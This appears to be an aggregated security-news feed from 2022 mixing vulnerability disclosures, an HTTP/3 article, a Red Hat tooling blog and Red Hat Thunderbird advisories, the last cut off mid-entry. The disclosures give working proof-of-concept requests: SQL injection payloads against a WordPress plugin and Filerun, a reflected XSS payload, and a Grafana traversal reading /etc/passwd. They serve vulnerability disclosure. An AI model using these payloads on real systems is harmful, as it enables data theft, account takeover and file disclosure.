The Five Minute Webshop WordPress plugin through 1.3.2 does not sanitise and escape the id parameter before using it in a SQL statement when editing a product via the admin dashboard, leading to an SQL Injection

**(2/2) five-minute-webshop 1.3.2 WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

May 09 2022

Affected Software

five-minute-webshop

Affected Software Type

WordPress plugin

Version

1.3.2

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-1686

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Daniel Krohmer, Shi Chen

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/five-minute-webshop

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-1686

**Vulnerability Description**

The id query parameter in five-minute-webshop 1.3.2 is vulnerable to SQL injection. An authenticated attacker may abuse the Edit functionality of the plugin to craft a malicious GET request.

**Exploitation Guide**

This exploit requires an added product. For demonstration and evaluation purposes, this is done by calling a database query within the wordpress database: INSERT INTO fmwes_products VALUES (1, "test", "test", 50, 50, 0);.

Login as admin user. This attack requires at least admin privileges.

Go to Five Minute Webshop and then hit Manage products.

Choose the previously created product and click on Edit.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of id at line 8 in ./includes/pages/edit_product.php. The final database query is called at line 10. 

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.** The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=fmwes_edit_product&id=1+AND+(SELECT+6037+FROM+(SELECT(SLEEP(5)))Uiuu) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=fmwes_products
    DNT: 1
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651742457%7CNFH9oxgPdUB0I5vQ0G9JsYZRz7fPrB6cCYyat4sPQUG%7C6af9672ff631b297870bbf4570e0d0bbb4e2fb79eb23af6720e85e7816ec4168;  PHPSESSID=ggbg3ps61166g6trc1gqkkj2cf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651742457%7CNFH9oxgPdUB0I5vQ0G9JsYZRz7fPrB6cCYyat4sPQUG%7Ce10b7e0de3a21c7ef652093e7f79ad29b7601994cdd120ec083ded4b636f3ba8; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651569658
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-1686: Security Bulletin

The backbone of the web has received a major upgrade

The backbone of the web has received a major upgrade

ANALYSIS The HTTP/3 protocol has received RFC 9114 standardization – a boost for internet security, but not one without hurdles for web developers.

This week, the Internet Engineering Task Force (IETF) released HTTP/3, published as RFC 9114.

The HTTP protocol is the backbone of the web. The Hypertext Transfer Protocol (HTTP) acts as an application layer for facilitating communication between servers and browsers, fetching resources, and transferring data. HTTPS is HTTP with additional security via encryption.

**BACKGROUND** HTTP/3: Everything you need to know about the next-generation web protocol

HTTP/3 is the latest revision of the HTTP protocol, taking over from 2015’s HTTP/2. HTTP/3 is designed to address some of the performance issues inherent in HTTP/2, improving the user experience, decreasing the impact of packet loss without head-of-line blocking, speeding up handshake requirements, and enabling encryption by default.

The protocol utilizes space congestion control over User Datagram Protocol (UDP).

**QUIC step**

One of the major differences in HTTP/3 is QUIC. Developed by Google, Quick UDP Internet Connections (QUIC) was adopted by the IETF, and a tailored version provides a cornerstone of HTTP/3.

As noted by Cloudflare, implementing QUIC sets up encrypted connections by default at the transport layer, combining handshakes into one action and encrypting the metadata exchanged between connections.

Read more of the latest secure development news

Packet numbers and header information is, therefore, removed from eavesdroppers and attackers. This improvement might potentially lower the success of manipulator-in-the-middle (MitM) attacks, IP spoofing, and denial-of-service assaults.

“This feature was not included in HTTP/2,” Cloudflare notes. “Encrypting this data helps keep actionable information about user behavior out of attackers’ hands.”

Encryption at the transport layer isn’t the end of the story. Akamai says that as HTTP/3 runs on QUIC, this also paves the way for future innovations in encrypted transport and communication – as we’ve already seen with the QUIC Datagram extension (RFC 9221), a technology to manage both UDP and TCP traffic securely.

Furthermore, the protocol supports zero round-trip time (0-RTT), introduced in TLS 1.3, which skips the handshake requirement in trusted settings – but a downside is that this could lead to replay attacks without adequate protection.

**‘Challenging prospect’**

Rustam Lalkaka, director of product at Cloudflare, previously told us that while HTTP/3 has a range of security and performance benefits, enabling QUIC can be a challenging prospect for developers as many widely-sed technologies are yet to add QUIC and HTTP/3 support.

Some transit providers and ISPs may be hostile to UDP traffic, and there may also be a need for increased CPU usage when HTTP/3 is implemented, a detriment to both servers and web browsers.

Support for HTTP/3 has been rolled out gradually across major browsers including Google Chrome, Mozilla Firefox, and Microsoft Edge. Apple Safari also provides support, although at the time of writing, this must be enabled in the ‘Experimental Features’ tab in the developer menu.

Cloudflare scans have revealed that the majority of online traffic is facilitated by HTTP/2. The majority of current HTTP/3 requests are made by Chrome users, followed by Edge and Firefox. Safari volumes are minimal, but Cloudflare expects an uptick once Apple enables HTTP/3 support by default.

Cloudflare Radar estimates that 8% of internet traffic is HTTP/1-based, followed by HTTP/2 at 67%, and HTTP/3 at 25%.

**YOU MIGHT ALSO LIKE** Dozens of high-traffic websites vulnerable to ‘account pre-hijacking’, study finds

HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

As a Technical Account Manager (TAM) one of the best parts of the job is the regular contact with our customers, talking to them frequently and helping them solve interesting problems.
One of our customers came to me with an interesting challenge.  The team creates a new Gold Image every month and they wanted to provide release notes for the image, automatically generating a list of CVEs that had been fixed in this version of the image.

As a Technical Account Manager (TAM) one of the best parts of the job is the regular contact with our customers, talking to them frequently and helping them solve interesting problems.

One of our customers came to me with an interesting challenge.  The team creates a new Gold Image every month and they wanted to provide release notes for the image, automatically generating a list of CVEs that had been fixed in this version of the image.

Red Hat publishes release notes for new product versions which include details of CVEs and RHSAs which have been fixed in a release, such as in the recently released Red Hat Enterprise Linux 8.6 

The problem with the release notes is that they only cover a specific point of time, and Red Hat releases fixes much more frequently. So, how do we get the information on what has been released between two dates? How can we find out what CVEs have been fixed and what RHSAs have been released between the last time you published an image and now?

This is where daysofrisk.pl comes in.

In this blog, we explore the use of the daysofrisk.pl script provided on the Red Hat Security Data page and show you how you can use it to return a list of CVEs and RHSAs included in a particular Red Hat Product between two specified dates.

**Getting started with daysofrisk.pl**

The daysofrisk.pl script requires the use of three other .txt files also published on the same page. We will create a directory to hold the script and the required files, use  wget  to download the required files from the Red Hat site, and also set the permissions on the script.

mkdir security\_review
cd security\_review
wget https://www.redhat.com/security/data/metrics/release\_dates.txt https://www.redhat.com/security/data/metrics/rhsamapcpe.txt https://www.redhat.com/security/data/metrics/cve\_dates.txt https://www.redhat.com/security/data/metrics/daysofrisk.pl
chmod 700 daysofrisk.pl

Now that you have the script and its required working files, we can explore everything that's possible by running:

./daysofrisk.pl --help

This will provide us with a long list of available options.

usage: daysofrisk.pl \[OPTIONS\]
  --cpe <product/package to generate stats for>
            \[examples: --cpe all
                       --cpe enterprise\_linux
                       --cpe enterprise\_linux:3
                       --cpe enterprise\_linux:5::client/firefox
                       --cpe /httpd \]
  --cpeexclude
            \[product/package to exclude from stats\]
  --severity <all|C|I|M|L|CI|CIM|IL...>
            \[filter severity, 'C'ritical 'I'mportant 'M'oderate 'L'ow\]
  --cvss <range>
            \[filter on CVSSv2 base score, example '6.8'|'0-5'|'8-10'|'high'|...\]
  --cvss3 <range>
            \[filter on CVSSv3 base score, example '6.8'|'0.1-5'|'high'|'critical'|...\]
  --dates \[<YYYYMMDD>\]-\[<YYYYMMDD>\]
            \[date range, default is 'all', example '20090101-'|'20080203-20080303'\]
  --datestart \[<YYYYMMDD>\]
            \[start date, example '20090101'\]
  --dateend \[<YYYYMMDD>\]
            \[end date, example '20100101'\]
  --xmlsummary <filename>
            \[output the XML summary to this file, default summary.xml\]
  --csv
            \[append results as a comma-separated list\]
  --quiet | verbose
            \[set verbosity level\]
  --help
            \[show this help\]

**What has been updated between two dates?**

Let’s say we wanted to find all the CVEs and RHSAs released between (in this example) April 1st and April 30th, 2022 for Red Hat Enterprise Linux 8.  We can do this with the following command:

./daysofrisk.pl --cpe enterprise\_linux:8 --datestart 20220401 --dateend 20220430 --xmlsummary rhel-8-report.xml

This command will only take a few seconds to complete and will output a summary of the data:

\*\* Product: Red Hat Enterprise Linux 8 (all packages)
\*\* CPE: redhat:enterprise\_linux:8
\*\* Severity: Critical Important Moderate Low
\*\* Dates: 20220401 - 20220430 (30 days)

\*\* 17 advisories (I=11 L=1 M=5 )
\*\* 35 vulnerabilities (I=10 L=7 M=18 )
\*\* Advisory Workload index is 0.40
\*\* Vulnerability Workload index is 0.46
\*\* Average is 127 days
\*\* Median is 19 days
\*\* 0% were 0day
\*\* 17% were within 1 day
\*\* 45% were within 7 days
\*\* 45% were within 14 days
\*\* 60% were within 31 days
\*\* 71% were within 90 days

For our use case, what we are more interested in is the generated rhel-8-report.xml.  Below is a small snippet of the information contained inside the summary xml file:

<item>
  <cve>CVE-2022-28286</cve>
  <severity>L</severity>
  <source>relationship</source>
  <reportedon>20220405</reportedon>
  <cvss3>4.3</cvss3>
  <fixedby>RHSA-2022:1301</fixedby>
  <fixedby>RHSA-2022:1287</fixedby>
  <fixedon>20220408</fixedon>
  <publicon>20220405</publicon>
  <daysdiff>3</daysdiff>
</item>

The complete file lists every CVE which was fixed between the specified dates, as well as the associated RHSA which fixed it and the date it was fixed for the specified product.

**Summary**

Here we have covered the basics of the daysofrisk.pl script provided on the Red Hat Security Data page, including how you can use it to return a list of CVEs and RHSAs included in a Red Hat Product between two dates.

If you would like to take this a bit further, it would be possible to use a bash script to automate the download of the required .txt files to ensure each run has up to date data. It would also be possible to enhance the report by using the Red Hat Security Data API to pull in descriptions and titles, rather than just giving us the CVE and RHSA numbers, but that is outside the scope of this article.

Getting a list of fixes for a Red Hat product between two dates is easy with daysofrisk.pl

A reflected cross-site scripting (XSS) vulnerability in the login portal of Avantune Genialcloud ProJ - 10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

\# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: \[REDACTED\] Cookie: ASP.NET\_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: \*/\* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 var Msg = 'Invalid username or password';alert("y0! XSS here :)")//'; ...\[SNIP\]... Timeline: 2022-01-05: Vulnerability discovered. 2022-01-06: Vendor contacted. 2022-02-07: No reply, vendor contacted for 2nd time. 2022-02-10: Request for CVE reservation. 2022-04-16: Assigned CVE number CVE-2022-29296. 2022-05-07: No reply, vendor contacted for 3rd time. 2022-06-01: Public disclosure. PoC Screenshots: https://imagebin.ca/v/6j86ekMqKZD8 https://postimg.cc/XXv6YbK9

CVE-2022-29296

In Afian Filerun 20220202, lack of sanitization of the POST parameter "metadata[]" in `/?module=fileman&section=get&page=grid` leads to SQL injection.

**CVE-2022-30469 - SQL-Injection (Afian Filerun)**

**CVE-ID:** CVE-2022-30469

**Affected Product:** Filerun

**Affected Versions:** Update 20220202 (others untested)

**Vulnerability:** SQL-Injection

**Vendor URL:** https://filerun.com/

**Status:** Fixed in FileRun Update 20220519 (silently)

**Severity:** High

**Description**

With a normal user account, an attacker can inject custom SQL statements into the metadata[] parameter of the fileman module.

This allows access to user account data, filerun settings and session information. The impact of the complete exploit chain depends on the filerun setup. If the session information is not stored in files but in the "session" table, you can easily takeover the superuser account. If the SMTP settings match the email account of the super user, you may reset its password and fetch the reset mail.

**Proof of Concept**

    POST /?module=fileman&section=get&page=grid HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 68
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/
    Cookie: FileRunSID=c82f680f8892c8f5655923e2b5c4d6dc
    
    metadata%5B%5D=13881157SQLiMe&path=%2FROOT%2FHOME
    

Payload used Timebased:

    metadata%5b%5d=13881157')%20AND%20(SELECT%207003%20FROM%20(SELECT(SLEEP(5)))AGYO)%20AND%20('ltyE'='ltyE&path=%2fROOT%2FHOME
    

Payload used Boolean based:

    metadata[]=13881157')+OR+NOT+('1111'='1111&path=/ROOT/HOME
    

The SQL-Statement where we inject:

    SELECT * FROM df_modules_metadata_values WHERE ((file_id = '13') AND (field_id IN ('13881157') OR NOT '1111'='1111'))) ORDER BY id DESC

CVE-2022-30469: PoCs/CVE-2022-30469.md at main · blockomat2100/PoCs

Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd URI.

**grafana**

grafana 8.4.3 (b7d2911ca)

**First point - CVE-2022-32276****Unauthenticated and authenticated users can send a false request for snapshot query using random key parameters, having access to the system dashboard area by going through the login page.**

• Rated version: 8.4.3 (b7d2911ca) • Access the system the user is directed to the system home page, as image 1 

Image 1: login form

It has been verified that an unauthenticated user knowing the vulnerable directories can enter random ID value which allows unauthenticated access to the hospitalized system pages. Parameter used: /dashboard/snapshot/\*?orgId=0 /invite/: 

Image 2: Unauthenticated access to snapshot list

Image 3: Unauthenticated access to the dashboard menu

Image 4: Unauthenticated access to the filter menu

**Second point - CVE-2022-32275**

• Rated version: 8.4.3 (b7d2911ca) • Injection of parameters in http request.

**It has been verified that by injecting the following request into the login form the system returns internal page.**

Image 5: login form

Viewing the request in burpsuite 

Image 6: Intercepting the request by burpsuite

Change the request by adding /{{constructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 , encode : /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1

Image 7: Request changed before submission to server

Image 8: Data returned from the tampered request

**POC 2**

Send the request to the Burpsuite Repeater function and change the request header to:

    GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1
    Host: <grafana_host>:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-BR,en;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close-up
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    

Image 9: Changing the request in the repeater function.

Image 10: Unauthenticated access

**References:***   https://cwe.mitre.org/data/definitions/1345.html
*   https://cwe.mitre.org/data/definitions/284.html
*   https://cwe.mitre.org/data/definitions/552.html
*   https://cwe.mitre.org/data/definitions/548.html
*   https://cwe.mitre.org/data/definitions/706.html
*   https://owasp.org/www-pdf-archive/OWASP\_SCP\_v1.3\_pt-BR.pdf

CVE-2022-32275: grafana/README.md at main · BrotherOfJhonny/grafana

Red Hat Security Advisory 2022-4887-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.10.0. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:4887-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4887  
Issue date:        2022-06-03  
CVE Names:         CVE-2022-1834 CVE-2022-31736 CVE-2022-31737  
                   CVE-2022-31738 CVE-2022-31740 CVE-2022-31741  
                   CVE-2022-31742 CVE-2022-31747  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.10.0.

Security Fix(es):

* Mozilla: Braille space character caused incorrect sender email to be  
shown for a digitally signed email (CVE-2022-1834)

* Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)

* Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)

* Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)

* Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)

* Mozilla: Uninitialized variable leads to invalid memory read  
(CVE-2022-31741)

* Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
(CVE-2022-31747)

* Mozilla: Querying a WebAuthn token with a large number of allowCredential  
entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked  
2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL  
2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode  
2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64  
2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read  
2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information  
2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
2092416 - CVE-2022-1834 Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-91.10.0-1.el8_6.src.rpm

aarch64:  
thunderbird-91.10.0-1.el8_6.aarch64.rpm  
thunderbird-debuginfo-91.10.0-1.el8_6.aarch64.rpm  
thunderbird-debugsource-91.10.0-1.el8_6.aarch64.rpm

ppc64le:  
thunderbird-91.10.0-1.el8_6.ppc64le.rpm  
thunderbird-debuginfo-91.10.0-1.el8_6.ppc64le.rpm  
thunderbird-debugsource-91.10.0-1.el8_6.ppc64le.rpm

s390x:  
thunderbird-91.10.0-1.el8_6.s390x.rpm  
thunderbird-debuginfo-91.10.0-1.el8_6.s390x.rpm  
thunderbird-debugsource-91.10.0-1.el8_6.s390x.rpm

x86_64:  
thunderbird-91.10.0-1.el8_6.x86_64.rpm  
thunderbird-debuginfo-91.10.0-1.el8_6.x86_64.rpm  
thunderbird-debugsource-91.10.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1834  
https://access.redhat.com/security/cve/CVE-2022-31736  
https://access.redhat.com/security/cve/CVE-2022-31737  
https://access.redhat.com/security/cve/CVE-2022-31738  
https://access.redhat.com/security/cve/CVE-2022-31740  
https://access.redhat.com/security/cve/CVE-2022-31741  
https://access.redhat.com/security/cve/CVE-2022-31742  
https://access.redhat.com/security/cve/CVE-2022-31747  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpp1ktzjgjWX9erEAQgiMA/+KBViY5emF6OCnnfQ7QrCmnVuqyND8QeO  
YYpv7QHaqe7dlntp07D2BdD6EadT/4f/Irk+SJzcBE3jwMRb6ySWnRBRgzN+YN3p  
ritAfqzpQ/4gi+eLqRb08VsU/BrW5IUEueqb7MuPmi0Hy2+wBu78tJHlaySRpOi9  
aISw2PFdD4P0srAXYxNXXz4THjLGSbfYS8SYx1qt7p3ZC+JIDiq2jrcAin+3Jxu9  
4WP1Fzaaieq0sJe6Xf0z9jw4E6B7MWwE4zBYZ1V1rZzQpg3IKgEyarwTkvORSHiC  
fLyd3eB9yUH/DGSmcglo7N1sMRcPUwaUt9K64fnyW6XrPpm+S02cQ7byZu8ETtLU  
NWnlXh8ruteJektiIjEOInPlIfYHHKoGo9GjQw77MlUXt6NBKUXa01g225fppyKb  
Cdt1SnsnCU5+2rVQ7YNf8VvysB8eQMshUsp9j2MnKYEj6/zOChDgqOWm1rf6uP/F  
SJhW93fv0WLJ37bXPmxPPdK8t3uMHVYT1nMUrQIaY+1C6fdg/vS3ouvN/ISOHpmH  
Sp4arsaZqgF3XEj85WbDOdKojYbrHdOxsEbOMhAlDxL+P7oeH0kDkvpV55kvDurW  
bf0jv9mwdW3xx6pZ81kgldwEEt8BeMBRlnLjj36GQRTHueyMYpuEGym6LrWTUnLg  
+3Y8PPfmnPU=ZARL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4887-01

Red Hat Security Advisory 2022-4890-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.10.0. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:4890-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4890  
Issue date:        2022-06-03  
CVE Names:         CVE-2022-1834 CVE-2022-31736 CVE-2022-31737  
                   CVE-2022-31738 CVE-2022-31740 CVE-2022-31741  
                   CVE-2022-31742 CVE-2022-31747  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.10.0.

Security Fix(es):

* Mozilla: Braille space character caused incorrect sender email to be  
shown for a digitally signed email (CVE-2022-1834)

* Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)

* Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)

* Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)

* Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)

* Mozilla: Uninitialized variable leads to invalid memory read  
(CVE-2022-31741)

* Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
(CVE-2022-31747)

* Mozilla: Querying a WebAuthn token with a large number of allowCredential  
entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked  
2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL  
2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode  
2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64  
2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read  
2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information  
2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
2092416 - CVE-2022-1834 Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
thunderbird-91.10.0-1.el8_2.src.rpm

aarch64:  
thunderbird-91.10.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-91.10.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-91.10.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-91.10.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-91.10.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-91.10.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-91.10.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-91.10.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-91.10.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1834  
https://access.redhat.com/security/cve/CVE-2022-31736  
https://access.redhat.com/security/cve/CVE-2022-31737  
https://access.redhat.com/security/cve/CVE-2022-31738  
https://access.redhat.com/security/cve/CVE-2022-31740  
https://access.redhat.com/security/cve/CVE-2022-31741  
https://access.redhat.com/security/cve/CVE-2022-31742  
https://access.redhat.com/security/cve/CVE-2022-31747  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpp1fdzjgjWX9erEAQjP4BAAhpNCG4B8bgxt0JpmKf0G9Vogmh7ANwez  
jwcZStCfVXOdyxWjg0xnHPn9JGFbr6rM96tVNzQ9gtBzrxPOxZ7mnwZ/CcEGf82p  
UvIlAYkMmArESzHjLAh3AzBMQPCNkzgABS7CJzHyO0Zg5+ZCCjgc9bRLCUuPaMng  
umxueFEBFz/lOcy8sJLlAv17k6CbpYKRTiF+dL7IGvqs6wY1LqoVj0EHFcs8mDmX  
/GlwiCGligeWTJ2kxLmz//QGiCPowsSWwgZzyZnqRfzo415mjocO5dtVPA0wp1VL  
nBkqkYf9QllrjuHrxyqJa3c/j2Xv4BTEZxHOhdD6H+6wIjAcTqz4nSTxDCjmXmQd  
vHRO2G6NrukqQEMY7eB8y08XhiR/BQXt+q2bxjk3EOD2Pp1Jpi3SPTGNomx2sSaN  
G/SOpWLnO3rSLchke7uAUDefxqQ2hy2DJDkHY5hrrhJF2aSsTfHP0rFoQfhZTyAz  
rVK7DMCyyxOaq4uihcrLTAH/u7qYmAedpQcAcpPsQzTWqKEmCZbHi1Uhl929FKqh  
ZKPLSnVdPaZSrA056NjHygwyGfqfUz/p8schUZ5SocUnMapaEfC+YsLJVvTKzlHQ  
kS/nfNjV0u7ERYURp913XH6znmeOdBgaG8ZwDwMhuTdy24pHrojGqWF5N2G1xLY+  
dOKz18j3b40=Q1Np  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4890-01

Red Hat Security Advisory 2022-4892-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.10.0. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:4892-01  
Product:           Red Hat Enterprise Linux  
